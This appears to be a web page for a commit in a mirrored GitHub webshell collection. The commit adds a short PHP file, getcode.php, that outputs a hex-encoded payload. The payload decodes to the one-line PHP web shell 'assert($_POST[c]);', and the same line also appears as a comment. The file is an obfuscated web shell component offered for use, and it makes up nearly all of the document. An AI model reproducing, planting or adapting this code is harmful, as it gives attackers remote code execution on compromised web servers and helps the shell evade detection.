mirror of
https://github.com/tennc/webshell.git
synced 2025-12-06 12:51:28 +00:00
add getcode.php @tank96a 👍
author : tank96a from : http://tank96a.github.io/article/2015/04/27/php-horse/
This commit is contained in:
7
php/tank96a/getcode.php
Normal file
7
php/tank96a/getcode.php
Normal file
@@ -0,0 +1,7 @@
|
|||||||
|
<?php
|
||||||
|
//getcode.php
|
||||||
|
//assert($_POST[c]);
|
||||||
|
$cmd=$_GET['call'];
|
||||||
|
if ($cmd=='code')
|
||||||
|
echo sprintf('61737365727428245f504f53545b635d293b');
|
||||||
|
?>
|
||||||
Reference in New Issue
Block a user